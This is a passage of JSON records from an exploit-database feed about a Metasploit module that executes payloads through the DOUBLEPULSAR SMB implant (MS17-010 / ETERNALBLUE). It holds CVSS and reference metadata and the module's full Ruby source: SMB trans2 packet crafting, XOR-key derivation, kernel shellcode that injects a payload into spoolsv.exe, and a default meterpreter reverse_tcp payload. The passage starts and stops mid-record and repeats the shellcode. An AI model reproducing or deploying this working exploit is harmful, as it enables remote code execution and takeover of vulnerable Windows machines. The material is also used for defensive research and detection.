\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-27] #"}, "lastseen": "2021-09-26T22:18:45", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "4f2f981069e569e37528cda4fab18437", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T06:16:50", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-27752", 
"1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:16:50", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-28T06:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-28] #"}, "lastseen": "2021-09-28T06:16:50", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "c7b3d08ef8058e323fe3bacbbc297ee3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147"], 